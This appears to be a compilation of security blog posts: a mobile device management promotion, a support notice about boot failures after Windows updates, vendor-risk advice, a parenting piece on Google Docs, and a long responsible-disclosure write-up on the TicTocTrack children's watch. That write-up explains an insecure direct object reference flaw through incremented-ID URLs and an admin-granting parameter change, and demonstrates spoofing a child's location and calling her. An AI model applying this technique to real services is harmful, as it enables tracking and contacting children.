To ensure that organizations keep their defenses secure, it is imperative that they secure their company devices with mobile devices management solution. Network administrators can consider the Seqrite mSuite solution for this purpose. This is a powerful solution to increase the productivity of an enterprise by mobilizing the workforce while ensuring that enterprise data remains absolutely secure. The solution allows network managers to get total control over all applications installed on official devices, monitor internet usage patterns, track device location and apply company policies as per the location and time, and provide support through remote device control as well as file transfer. Organizations can remain in total control of what’s happening with their data even beyond their own network.

If you’re still wondering why Seqrite mSuite is the perfect solution for your mobile device management needs, here are five reasons to convince you:

  1. Single Console Management for All Devices

Seqrite mSuite offers easy device management by offering single console management for all devices. Enrolment can be done in minutes, saving precious time with features such as remote ring, locking/unlocking, locating/tracing and wiping of devices. They can also be grouped together under one single policy applied and configured. Devices can also be tracked on a map in real time.

  1. Comprehensive security management

Enterprise administrators don’t need to worry about security with Seqrite’s built-in antivirus that keeps data safe from Viruses, Trojans, ransomware and organized cybercrime attacks. Admins can easily schedule a Quick Scan or Full Scan on any enrolled device remotely. Seqrite mSuite offers excellent web security thanks to browsing, phishing and web protection.

  1. Seamless App Management

Applications running on the enrolled devices can be easily managed and secured. Applications and updates can be pushed from server to devices with blacklisting and whitelisting offered. Users can download apps on demand through the enterprise app store which establishes control over the use of applications. The device can be transformed to use a single app through the kiosk mode feature.

  1. Easy Data Monitoring & Management

It’s easy to stay in control of all critical data with Seqrite mSuite. Digital boundaries can be defined by applying restrictions on devices with Wi-Fi, Geo, and Time fFence Data usage can be monitored through mobile and Wi-Fi networks with interactive reports provided with graphical summaries. Multiple default policies offer enhanced security which can be customized for compliance.

  1. Easy to use and customizable

Apart from the above features, Seqrite mSuite offers several features which make it easy to use and customizable. Bulk file distribution can be done from console to Android devices. The solution also includes third party SMS gateway integration for SMS notification and custom mSuite app distribution for enrolment.

The post Why choose Seqrite mSuite- we give you 5 reasons! appeared first on Seqrite Blog.

PCs fail to boot up / Freeze after receiving Microsoft Windows 9-April-2019 updates and rebooting the PC

Quick Heal and Seqrite users are reporting that PCs fails to boot up / Freeze after installing 9th April Windows Updates and Rebooting the system. Symptoms:  Users have Quick Heal or Seqrite product installed and running on their systems. The PCs fail to boot up / Freeze after installing Windows Updates of 9-April-2019 and Rebootingthe system. There are…

PCs fail to boot up/Freeze after receiving Microsoft Windows 9-April-2019 updates and rebooting the PC

Estimated reading time: 2 minutes

Summary: Quick Heal and Seqrite users are reporting that PCs fails to boot up / Freeze after installing 9th April Windows Updates and Rebooting the system.

Symptoms: 

  • Users have Quick Heal or Seqrite product installed and running on their systems.
  • The PCs fail to boot up/Freeze after installing Windows Updates of 9-April-2019 and Rebootingthe system.
  • There are also some instances reported of PCs slow-down especially on Windows 10 1809.

Affected Operating Systems: 

  • As of now we have cases reported on Windows 8.1 and below (Windows 8/Windows 7).
  • Few cases reported on Windows 10, Windows 2008, Windows 2012 as well.
  • While we have observed other AV vendors facing similar issues with Windows 2008 and 2008 R2, Windows 2012 or 2012 R2 running on their system.
  • Windows 10 – System slowness only.

Windows Updates causing the issue (Under Investigation): 

  • Windows 7: KB4493472, KB4493448
  • Windows 10: KB4493509

Information on Windows 9-April-2019 Update Release: 

For more information on Microsoft Windows 9-April-2019 release notes, click here

Workaround:

  • Those who have installed these updates but haven’t rebooted their PCs might encounter similar symptoms. As a precaution, we recommend users to uninstall the contentious Windows KB updates prior to rebooting.
  • Follow the steps listed here to uninstall the Windows KB Updates.
  • For customers affected by this issue, we recommend rebooting the PCs in Safe Mode and Uninstall the Windows KB Updates.
  • Follow the steps listed below to reboot the PCs in Safe mode and uninstall the KB Updates.
  • Windows 10 : Click here
  • Windows 8 and Below: Click here
  • Once the Windows KB is uninstalled, disable “Automatic Windows Updates” by following the steps listed here.
  • After successful un-installation of the Windows KB updates, reboot the PC in normal mode.

Note: While disabling Windows Automatic Updates is not recommended and should be used only as a temporary measure to avoid download and installation of the contentious Windows KB updates. Once the issue is addressed, please do enable Windows Automatic Updates.

IMPORTANT: 

  • It is not necessary that all users observe these symptoms as it is potentially related to a timing issue during the boot up process and not reproducible all times.
  • Quick Heal / Seqrite Engineering Team is working closely with Microsoft to get this issue addressed on high priority.
  • This KB Article will be updated with additional information on an ongoing basis and we recommend you visit this page to get the latest updates on this issue.

Please get in touch with Quick Heal/Seqrite Technical Support Team for more information or any assistance related to this issue.

The post PCs fail to boot up/Freeze after receiving Microsoft Windows 9-April-2019 updates and rebooting the PC appeared first on Seqrite Blog.

Third Party Security Risks to Consider and Manage

Guest article by Josh Lefkowitz, CEO of Flashpoint
 
Acceptable business risks must be managed, and none more so than those associated with external vendors who often have intimate access to infrastructure or business data. As we’ve seen with numerous breaches where attackers were able to leverage a weaknesses a contractor or service provider, third-party risk must be assessed and mitigated during the early stages of such a partnership, as well as throughout the relationship.
 
The following tips can help security decision makers more effectively address the risks posed by relationships with technology vendors.
 
Do Your Homework
Conducting thorough due diligence on a prospective vendor is essential. Organisations could evaluate technical and regulatory risk through due diligence questionnaires, for example, or even on-site visits if necessary. The point is to evaluate not only a third party’s information security risk, but compliance with regulations such as GDPR for privacy and PCI DSS for payment card security, for example. An organisation may also want to evaluate a third party’s adherence to industry standards such as NIST or ISO in certain security- and privacy-related areas.
 
Next, consider what this compliance information doesn’t tell you. What do you still need to learn about the vendor’s security posture before deciding whether you’re comfortable with it? Think about what questions you still have and, if possible, seek answers from the vendor’s appropriate security contact. Here are some questions to pose: 
When was your last penetration test? Is your remediation on schedule?
  • Have you documented security incidents? How did you remediate those incidents?
  • Do you have the result of your last business continuity test? If yes, can you share it?
  • What security controls exist for your users? Do they use multifactor authentication, etc.?
  • How are you maturing your security program?
  • Are you ISO, SOC 1/SOC 2, and NIST Compliant, and is there documentation to support this? 
Additional Security: It’s All in the Controls
If you’re unsatisfied with the answers from a potential partner regarding their security, it’s OK to walk away, especially if you make the determination that working with the vendor may not be critical to your business.  

That’s not always the case, however. If you must partner with a particular third party and if no other reputable vendors offer anything comparable, you will likely need to implement additional technical and/or policy controls to mitigate the security risks associated with your business’s use of the offering, such as:
 
Technical
These are typically restrictions on the access and/or technical integrations of vendor offerings. For example, if a product is web-based but unencrypted, consider blocking users on your network from accessing its website; provided the proper authentication is in place, use its API instead. In most cases, there are two options, remediation or compensating controls:
  • Remediation: Can you work with the vendor to remediate the technical risk?
  • Compensating controls: If you cannot remediate the risks entirely, can you establish technical compensating controls to minimise or deflect the risk?
Policy
These are policies that users of the offering should follow, such as limits on the types and amounts of data that can be input securely. Some typical policy scenarios include:
  • Regulatory compliance: For example, a vendor’s non-compliance could mandate you walk away from a third-party relationship.
  • Contractual obligations: Are there contractual obligations in place with your existing clients that prevent you from working vendors who don’t meet certain security and privacy standards?
  • Security best practices: Ensure your policies around risk are enforced and determine whether they may conflict with your vendors’ policies.
Asset Inventory is a Must
There are several reasons why it’s imperative to know which of your business’s assets the vendor will be able to store and/or access. For one, this knowledge can help identify and shape any additional security controls. Second, having this knowledge on hand is crucial should the vendor suffer a breach. Knowing exactly what assets were impacted, as well as who is doing what with your inventory, can expedite your response and identify and mitigate any exposure efficiently and effectively.
 
Response Plans Must Include Partners
Before finalising a vendor relationship, it’s crucial to use all the information gathered during your due diligence process to construct a response plan in preparation for any future incidents the vendor might experience. Tracking the assets to which your vendor has access is one component of an effective response plan. Others include courses of action to mitigate exposure, disclosure and notification procedures, external communications strategies, and plans to re-evaluate the vendor’s security and remediation following an incident.
 
The most effective way to manage vendor risk is not to work with any external vendors in the first place, which isn’t a feasible strategy. The most secure and successful vendor relationships are rooted in preparation and transparency. Thoroughly understanding all facets of a vendor’s security program, implementing additional controls as needed to appropriately safeguard your business’s assets, and being prepared to respond to future incidents can go a long way toward reducing business risks associated with any vendor relationship.
Josh Lefkowitz, CEO of Flashpoint

How to Track Your Kids (and Other People’s Kids) With the TicTocTrack Watch

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Do you ever hear those stories from your parents along the lines of "when I was young..." and then there's a tale of how risky life was back then compared to today. You know, stuff like having to walk themselves to school without adult supervision, crazy stuff like that which we somehow seem to worry much more about today than what we did then. Never mind that far less kids go missing today than 20 years ago and there's much less chance of them being hit by a car, circumstances are such today that parents are more paranoid than ever.

The solution? Track your kids' movements, which brings us to TicTocTrack and the best way to understand their value proposition is via this news piece from a few years ago:

Irrespective of what I now know about the product and what you're about to read here, this sets off alarm bells for me. I've been involved with a bunch of really poorly implemented "Internet of Things" things in the past that presented serious privacy risks to those who used them. For example, there was VTech back in 2015 who leaked millions of kids' info after they registered with "smart" tablets. Then there was CloudPets leaking kids voices because the "smart" teddy bears that recorded them (yep, that's right) then stored those recordings in a publicly facing database with no password. Not to mention the various spyware apps often installed on kids' phones to track them which then subsequently leak their data all over the internet. mSpy leaked data. SpyFone leaked data.  Mobiispy leaked data. And that's just a small slice of them.

And then there's kids' smart watches themselves. A couple of years back, the Norwegian Consumer Council discovered a whole raft of security flaws in a number of them which covered products from Gator, GPS for barn and Xplora:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

These flaws included the ability for "a stranger [to] take control of the watch and track, eavesdrop on and communicate with the child" and "make it look like the child is somewhere it is not". These issues (among others), led the council's Director of Digital Policy to conclude that:

These watches have no place on a shop’s shelf, let alone on a child’s wrist.

Referencing that report, US Consumer groups drew a similar conclusion:

US consumer groups are now warning parents not to buy the devices

The manufacturers fixed the identified flaws... kind of. Two months later, critical security flaws still remained in some of the watches tested, the most egregious of which was with Gator's product:

Adding to the severity of the issues, Gator Norge gave the customers of the Gator2 watches a new Gator3 watch as compensation. The Gator3 watch turned out to have even more serious security flaws, storing parents and kids’ voice messages on an openly available webserver.

Around a similar time, Germany outright banned this class of watch. The by-line in that piece says it all:

German parents are being told to destroy smartwatches they have bought for their children after the country's telecoms regulator put a blanket ban in place to prevent sale of the devices, amid growing privacy concerns.

Wow - destroy them! The story goes on to refer to the German Federal Network Agency's rationale which includes the fact that "parents can use such children’s watches to listen unnoticed to the child’s environment". This is a really important "feature" to understand: these devices aren't just about tracking the kids whereabouts, they're also designed to listen to their surroundings... including their voices. Now on the one hand you might say "well, parents have a right to do that". Maybe so, maybe not, you'll hear vehement arguments on that both ways. But what if a stranger had that ability - how would you feel about that? We'll come back to that later.

Around a year later, Pen Test Partners in the UK found more security bugs. Really bad ones:

Guess what: a train wreck. Anyone could access the entire database, including real time child location, name, parents details etc.

This wasn't just bad in terms of the nature of the exposed data, it was also bad in terms of the ease with which it was accessed:

User[Grade] stands out in there. I changed the value to 2 and nothing happened, BUT change it to 0 and you get platform admin.

So change a number in the request and you become God. This is something which is easily discovered in minutes either by a legitimate tester within the organisation building the software (which obviously didn't happen) or... by someone with malicious intent. The Pen Test Partners piece concludes:

We keep seeing issues on cheap Chinese GPS watches, ranging from simple Insecure Direct Object Request (IDOR), to this even simpler full platform take over with a simple request parameter change.

Keep that exploit in mind - insecure direct object references are as simple as taking a URL like this:

example.com/get-kids-location?kid-id=27

And changing it to this:

example.com/get-kids-location?kid-id=28

The level of sophistication required to exploit an IDOR vulnerability boils down to being able to count. That was in January this year, fast forward a few months and Ken Munro from Pen Test Partners contacts me. He's found more serious vulnerabilities with the services these devices use and in particular, with TicTocTrack's product. He believes the same insecure direct object reference issues are plaguing the Aussie service and they needs someone on the ground here to help establish the legitimacy of the findings.

To test Pen Test Partners' theory, I decided to play your typical parent in terms of the buying and setup process and use my 6-year old daughter, Elle, as the typical child. She's smack bang in the demographic of who the watch is designed for and I was happy to give Ken access to her movements for the purposes of his research. So it's off to tictoctrack.com.au where the site leans on its Aussie origins:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I can understand why companies emphasise the "we host your data near you" mantra, but in practical terms it makes no difference whether it's in Australia or, say, the US. You're also often talking about services that are written and / or managed by offshore companies anyway so where the data physically sits really is inconsequential (note: this is assuming no regulatory obligations around co-locating data in the country of origin). The "we take the security of your data seriously" bit, however, always worries me and as you'll see shortly, that concern is warranted.

The Aussie angle comes up again further down the page too:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

At this point it's probably worthwhile pointing out that despite the Aussieness asserted on the front page, the origin of the watch isn't exactly very Australian. In fact, the watch should be rather familiar by now:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

So for all the talk of TicTocTrack, the hardware itself is actually Gator. In fact, you can see exactly the same devices over on the Gator website:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

It's not clear how they arrived at the conclusion of "the world's most reputable GPS watch for kids and elders", especially given the earlier findings. And who is Gator? They're a Chinese company located in Shenzhen:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The country of origin would be largely inconsequential were it not for TicTocTrack's insistence on playing the Aussie card earlier on. It's also relevant in light of the embedded media piece at the start of this blog post: this isn't "a new device developed by a Brisbane mother" nor is the mother "the creator of the watch". In fairness to Karen Cantwell, it wasn't her making those claims in the story and the media does have a way of spinning things, but it's important to be clear about this given how this story unfolds from here.

Regardless, let's proceed and actually buy the thing. I get Elle involved and allow her to choose the colour, with rather predictable results:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The terms and conditions were actually pretty light (kudos for that!) but the link to the privacy and security policies was dead. I go through the checkout process and buy the watch:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

iStaySafe Pty Ltd is the parent company and we'll see that name pop up again later on. An email promptly arrives with a receipt and a notice about the order being processed, albeit without a delivery time frame mentioned. With time to kill, I decide to poke around and take a look at how the tracking works, starting with the link below:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Turns out the tracking app is a totally different website running on a totally different hosting provider in a totally different state:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The primary site is down in Melbourne whilst the tracking site is in Brisbane per the info on the front page. My credentials from the primary site don't work there and registering results in me needing to choose a reseller:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Here we see iStaySafe again, but it's the other resellers (all Aussie companies) that help put the whole Gator situation in context. Uniting Agewell provides services to the elderly and when considering the nature of the Gator watch, it made me think back to a comment on the Chinese manufacturer's website: "the world's most reputable GPS watch for kids and elders". Cellnet is a publicly listed company with a heap of different brands. Weareco produces uniforms. eHomeCare provides "smart care technology for healthy ageing" and their product page on the GPS tracking watch explains the relationship:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

As it turns out, attempting to sign up just boots me back to the TicTocTrack website so I assume I just need to wait for the watch to arrive before going any further. Still, this has been a useful exercise to understand not just how the various entities relate to each other, but also because it shows that the scope of this issue isn't just constrained to kids, it affects the elderly too.

A few days later, this lands in the mail:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch
How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I'm surprised by how chunky it is - this is a big unit! For context, here it is next to my series 4 Apple Watch (44mm - the big one):

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I'm not exactly expecting Apple build quality here (and as you can see from the pic, it's a long way from that), but this is a lot to put on a little kid's wrist. You can see the access port for the physical SIM card (more on that later), as opposed to Apple's eSIM implementation so it's obviously going to consume a bunch of space when you're building a physical caddy into the design to hold a chip on a card.

Regardless, let's get on with the setup process and I'm going to be your average everyday parent and just follow the instructions:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The app is branded TicTocTrack and is published by iStaySafe:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Popping it open, the first step is registration (the mobile number is a pre-filled placeholder):

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I'm surprised by the empty space at the top and the bottom - just which generation of iPhone was this designed for? Certainly not the current gen XS, does that resolution put it back in about the iPhone 5 era from 2012? That'd be iOS 6 days which their user manual seems to suggest:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Whilst the aesthetics of the app might seem inconsequential, I've always found that it's a good indicator of overall quality and is often accompanied by shortcomings of a more serious nature. It's the little things that keep popping up, for example the language and grammar in the aforementioned user manual. Why is it "Support Platforms" and then "Supported devices"? And why is the opening sentence of the doc so... odd?

Welcome to TicTocTrack® User Manual! You are about to begin your journey with the live tracking with your family.

That sort of language appears every now and then, for example in the password reset section:

If you forget your password, please use web portal to obtain new password.

It has me wondering how much of this was outsourced overseas and again, that wouldn't normally be worth mentioning were it not for the emphasis placed on the Aussie origins of the service (I know, despite it being a Chinese watch). The actual origins of the service become clear once you look at the download links for the app:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Searching for that same "Nibaya" name on the TicTocTrack website turns up several different versions of the user manual:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

It turns out that Nibaya is a Sri Lankan software development company with a focus on quality control and quality assurance:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

We're also told by the browser that they're "Not secure" which is not a great look in this day and age. They do in fact have a certificate on the site, only thing is it expired two and a half years ago and they haven't bothered to renew it:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Moving on, there's a mobile phone number verification process which sends an SMS to my device:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Only thing is, the keyboard defaults back to purely alphabetical after every character is typed so unless you pre-fill the field from the SMS (which iOS natively allows you to do), it's a bit painful. Again, it's all the little things.

Following successful number verification, the app fires up and asks for access to location data:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Based on what I'd already read in the user manual, my location data can be used to direct me to a child wearing the watch so requesting this seems fine for that feature to function correctly.

Next is the money side of things and we're looking at $20 a month for the "Full Service Subscription":

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

If I'm honest, I'm still a bit confused about what this entails. Is this for the tracking service? Or for the Telstra SIM which it shipped with and is identically priced?

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Or is it for both? I'm assuming both but then when I look at the service plans on the website, none of them are priced at $19.99. Regardless, I take the $20 option and move on:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The adding a device bit I get - I'm going to need to pair the watch - but the subscription bit further confuses me because I've literally just bought a subscription on the previous screen! For my purposes I don't see myself needing it for any more than 7 days anyway so I'm not too concerned, let's go and add that new device:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

A new TicTocTrack watch it is:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

And let's go with the supplied SIM which then leads us to the device and SIM registration page:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The IMEI is the identifier of the device itself (the watch) and that can be scanned off the barcode in the packaging. The SIM ID relates to the pre-packaged SIM from Telstra, the barcode for which is under one of the grey obfuscation boxes in the earlier image. I call the device "Elle", register it and that's that.

Lastly, I insert the SIM into the watch (the metal flap for which opens in the opposite direction to the video tutorial and took me a good 5 minutes to work out for fear of breaking it), then drop it onto the power. Give it a couple of hours to charge, boot it up and shortly afterwards it's showing a 3G connection:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I give it a little time to sync to the TicTocTrack service then successfully find it in the app:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Drilling down on Elle's profile, I get an address and GPS coordinates which are both pretty accurate:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

To its credit, the watch does a pretty good job of the setup and tracking process once you're past some of the earlier hurdles. At this stage, I now have a device which is broadcasting its location reliably and I can successfully see it in the app. I'm not going to go through other features such as the ability to send an SOS or make a call, at this stage all I really care about is that the watch is now tracking her movements.

The next day, we head off to tennis camp (it's school holiday time) with the TicTocTrack / Gator on her wrist:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

She isn't aware of why she has the watch, to her it's just a new cool thing she gets to wear. And it's pink so that's all boxes ticked. She's now at the local court whilst I (in my helicopter parent mode), am sitting at home watching her location on my device:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Safe in the knowledge that my little girl is in a place that I trust, I get back to work. But someone else is also watching her location, someone on the other side of the world who is now able to track her every move - it's Ken. Not only is Ken watching, as far as TicTocTrack is concerned he's just taken her away:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

She's no longer playing tennis, she's now in the water somewhere off Wavebreak island. This isn't a GPS glitch; Ken has placed her four and a half kilometres away by exploiting an insecure direct object reference vulnerability in TicTocTrack's API. He's done this with my consent and only to my child, but you can see how this could easily be abused. It's not just the concept of making someone's child appear in a different location to what the parents expect, you could also have them appear exactly where the parents expect... when they're actually nowhere near there.

But these devices are about much more than just location tracking, they also enable 2-way voice communications just as you'd have on a more traditional cellular phone. This, in turn, introduces a far creepier risk - that unknown parties may be able to talk to your kids. In order to demonstrate this, I put the watch back on Elle and gave Pen Test Partners permission to contact her. Pay attention to how much interaction is required on her part in order for a stranger to begin talking to her simply by exploiting a vulnerability in the TicTocTrack service:

Even for me, that video is creepy. It required zero interaction because Vangelis was able to add himself as a parent and a parent can call the device and have it automatically answer without interaction by the child. The watch actually says "Dad" next to a little image of a male avatar so a kid would think it was their father calling them:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

This is precisely what the Germans were worried about when they banned the watches outright and when you watch that video, it seems like a pretty good move on their part.

The exploits go well beyond what I've already covered here too, for example:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

That link goes off to a Facebook post by an account called Travelling with Kids which very enthusiastically espouses the virtues of tracking them (it's not explicitly said, but the post appears to be promotional in nature):

The little wanderers were stoked to be going off to kids club at the Hard Rock Hotel Bali We have complete peace of mind knowing they’re wearing their TicTocTrack watches, so they can call us at anytime and with GeoFencing we know their location

By now, I'm sure you can see the irony in the "peace of mind" statement.

The technical flaws go much further than this but rather than covering them here, have a read of the Pen Test Partners write-up which includes details of the IDOR vulnerability. Just to put it in layman's terms, here's the discussion I had with Vangelis about it:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Being conscious that many people who don't normally travel in information security circles will read this, handling a vulnerability of this nature in a responsible fashion is enormously important. Obviously you want to remove the risk ASAP, but you also want to make sure that information about how to exploit it isn't made public beforehand. We religiously followed established best practices for responsible disclosure, here's the timeline with dates being local Aussie ones for me:

  1. Saturday 6 April: Ken first contacts me about the watch. I order one that morning.
  2. Tuesday 9 April: Watch arrives.
  3. Wednesday 10 April: I set the account up.
  4. Thursday 11 April: Elle wears the watch to tennis and we test "relocating" her.
  5. Friday 12 April: Vangelis calls her and has the discussion in the video above. Ken privately discloses the vulnerability to TicTocTrack support that night.
  6. Monday 15 April (today): TicTocTrack takes the service offline.

A couple of hours before publishing, I received a notification to the email address I signed up with as follows:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I'm in 2 minds about this message: on the one hand, they took the service down as fast as we could reasonably expect, being within a single business day so kudos to them on that. On the other hand, the messaging worries me in a number of ways:

Firstly, Ken didn't just "allege" that there were security flaws, he spelled it out. His precise wording was "The service fails to correctly verify that a user is authorised to access data, meaning that anyone can access any data, should they so wish". Anyone testing for a flaw of this nature would very quickly establish that changing a number in the request would hand over control of someone else's account thus proving the vulnerability beyond any shadow of a doubt. That word was used 3 times in the statement and it implies that they're unsubstantiated claims; they're clearly not. Which brings me to the next point:

Secondly, it wouldn't make sense to pull down the entire service if you weren't convinced there was a serious vulnerability. Many people allege there are security flaws in services but they don't generally go offline until they're proven. Clearly an incident like this has a bunch of downstream impact and acknowledging it publicly is not something you do on a whim. Either TicTocTrack was very confident in that accuracy of Ken's report (well beyond what "alleged" implies) or there were other factors I'm not aware of that drove them to rapidly pull the service.

Thirdly, the following statement was made without citing any evidence: "there has never been a security breach that has lead to our customer's personal data being used for malicious purposes". It's not uncommon to see a response like this following a security incident, but what it should read is "we don't know if there's ever been a security breach..." This vulnerability relied on an authenticated user with a legitimate account modifying a number in the request and the likelihood of that being logged in a fashion sufficient enough to establish it ever happened is extremely low. And if you were the kind of developers to log this sort of information, you'd also be the kind not to have the vulnerability in the first place!

Let's be perfectly clear - this is just one more incident in a series of similar ones impacting kids tracking watches and Gator in particular. What's infuriating about this situation is that not only do these egregiously obvious security flaws keep occurring, they're just not being taken seriously enough by the manufacturers and distributors when they do occur. There's no finer illustration of this than the statement Ken got when speaking to an agent over in his corner of the world:

UK agent for Gator said that they didn’t have the money for security, as otherwise they couldn’t afford a staff Xmas party

Is that really where we're at? Tossing up between exposing our kids in this fashion and beers at Christmas? If you're a parent ever considering buying one of these for your kid, just remember that quote. Inevitably, cost would have also been a major driver for TicTocTrack outsourcing their development to Sri Lanka, indeed it's something that Nabaya prides itself on:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I want to finish on a broader note than just TicTocTrack or Gator or even smart watches in general; a huge number of both the devices and services I see being marketed either directly at kids or at parents to monitor their kids are absolute garbage in terms of the effort invested in security and privacy. I mentioned CloudPets and VTech earlier on and I also mentioned spyware apps; by design, every one of these has access to data that most parents would consider very personal and, in many cases, (such as the photos older kids are often taking), very sensitive. These products are simply not designed with a security-orientated mindset and the development is often outsourced to cheap markets that build software on a shoestring. The sorts of flaws we're seeing perfectly illustrate that: CloudPets simply didn't have a password on their database and both the VTech and TicTocTrack vulnerabilities were as easy as just incrementing a number in a web request. A bunch of the spyware breaches I referred to occurred because the developers literally published all the collected data to the internet for the world to see. How much testing do you think actually went on in these cases? Did nobody even just try adding 1 to a number in the request? Because that's all Ken needed to do; Ken can count therefore Ken can hack a device tracking children. Maybe I should give Elle a go at that, her counting is coming along quite nicely...

There's only one way I'd track my kids with GPS and cellular and that's with an Apple Watch. I don't mean to make that sound trivial either because we're talking about a $549 outlay here which is a hell of a lot to spend on a kid's watch (plus you still need a companion iPhone), but Apple is the sort of organisation that not only puts privacy first, but makes sure they actually pay attention to their security posture too. As that Gator agent in the UK well knows, security costs money and if you want that as a consumer, you're going to need to pay for it.

I'll leave you with this thread I wrote up when first starting to look at the watch. It got a lot of traction and I'd like to encourage you to share it with your parenting friends on Twitter or via the one I also posted to Facebook.

Social Underground: Kids Using Google Docs as New Digital Hangout

Over the years kids have succeeded in staying one step ahead of parents on the digital front. Remember the golden days of social? Teens owned Facebook until every parent, auntie, and grandparent on the planet showed up. So, teens migrated to Instagram, Twitter, and Snapchat hoping to carve out a private patch of land for their tribe. And, according to a report in The Atlantic, the latest app these digital nomads have claimed as a covert hangout surprisingly is Google Docs.

Yes — Google Docs — that boring looking online tool many of us parents use at work to collaborate on projects. Google Docs is perfect when you think about it. The app can be accessed on a tablet, laptop, or as a phone app. It allows multiple users to edit a document at the same time — kind of like an online party or the ultimate private group chat.

To interact, kids can use the chat function or even highlight words or phrases and use a comment bubble to chat. Because teachers use the application in the classroom, kids are using Google Docs to chat during class without getting busted or dupe parents at home into thinking they are doing their homework.

Another big perk: Schools have firewalls that block social networking sites during school hours, but Google Docs is officially cleared for school use.

The Risks

As with any app, what begins as a covert, harmlessly chat channel between friends, can get malicious quickly as more and more people are invited into a shared document to talk.

Kids can easily share videos, memes, and hurtful, joking, or inappropriate content within a Google Doc. They can gang up on other kids and bully others just as they do on any other social network. Similar to the way images disappear on Snapchat in 24 hours or on Instagram stories, the “resolve” button on Google Docs chat function, allows kids to instantly delete a chat thread if a teacher or parent heads their way or hovers too closely.

Because Google Docs live on the cloud, there’s no need to download or install a piece of software to use or access it. Any device connected to the Internet can access a Google Doc, which means kids can also use it as a digital diary without a digital trail and hide potentially harmful behaviors from parents.

10 Ways to Coach Your Kids Around Digital Safety 

  1. Know where they go. Just as you’d ask where your child where he or she is going offline, be aware of their digital destinations online. Check on them during homework hours to be sure they aren’t chatting away their learning time.
  2. Check for other apps. If you’ve grounded your child from his or her smartphone for any reason, and they claim they have online homework to do, check their laptops and tablets for chat apps like Kik, WhatsApp, hidden vault apps, and of course, as we now know, Google Docs (see right for the icon).
  3. Remember, it’s forever. Even if an image or video is “resolved” on Google Docs, deleted on Instagram or Twitter, or “vanishes” on Snapchat, the great equalizer is the screenshot. Anyone can take one, and anyone can use it to bully, extort, or shame another person anytime they decide. Remind kids of the responsibility they have with any content they share anywhere online — privacy does not exist.
  4. Sharing is caring. If your child is on Google Docs and you have a hunch, they aren’t doing homework, ask them to share their document with you so you can monitor their work. Just hit the big blue “share” button and insert your email address and you will have immediate access to the homework document.
  5. Keep in touch with teachers. If your child’s grades begin to slip, he or she could be distracted at school. Ask about what apps are used in the classroom and alert the teacher if you think your child might be distracted be it with technology or anything else.
  6. Parental controls. Hey, we’re busy because we’re parents. Enlist some help in monitoring your child’s online activity with parental control software. This will help you block risky sites, limit excessive app use, and give you a report of where your kids spend most of their time online.
  7. Look for red flags. Everyone needs and desires privacy even your teen. The tough part is discerning when a teen is being private or trying to hide risky behavior. A few red flags to look for include defensiveness when asked about an app or chat activity, turning off a device screen when you come around, and getting angry when you ask to see their screen. Another sign of unhealthy app use is an increase in data use and fatigue at school from lack of sleep.
  8. Connect with other parents. Here’s the snag in the whole plan: The rules that apply to homework and devices at your house, may not apply at other people’s homes where kids often study. Bullying or inappropriate online behaviors often take place under other people’s roofs. So get intentional. Keep in touch with other parents. Find common ground on digital values before letting kids go offsite for homework time.
  9. Talk, talk, talk. Your best defense in keeping your kids safe online — be it using apps or other sites — is a strong offense. Talk with your kids often about what they like to do online, what their friends do, and address digital issues immediately.
  10. Be flexible. Parental monitoring is going to look different in every family. Every child is different in maturity, and every parent-child relationship varies greatly. Find a monitoring solution that works for your family. Coming down too hard on your kids could drive them into deeper secrecy while taking a hands-off approach could put them in danger. Try different methods until you find one that fits your family.

Remember: You won’t be able to keep your finger on everything your child is up to online, but you can still have a considerable influence by staying in the know on digital trends and best online safety practices.

The post Social Underground: Kids Using Google Docs as New Digital Hangout appeared first on McAfee Blogs.

Protect Your Privacy Spring Cleaning

I’ll be honest, my blog idea was generated from an article about spring cleaning.  Let’s face it, lots of things could benefit from spring cleaning:  homes, cars, desk drawers… How about your inbox?  Maybe the ever-growing number of presentation drafts in your documents folder?  How about the flash drive in your desk drawer?  Anything in […]

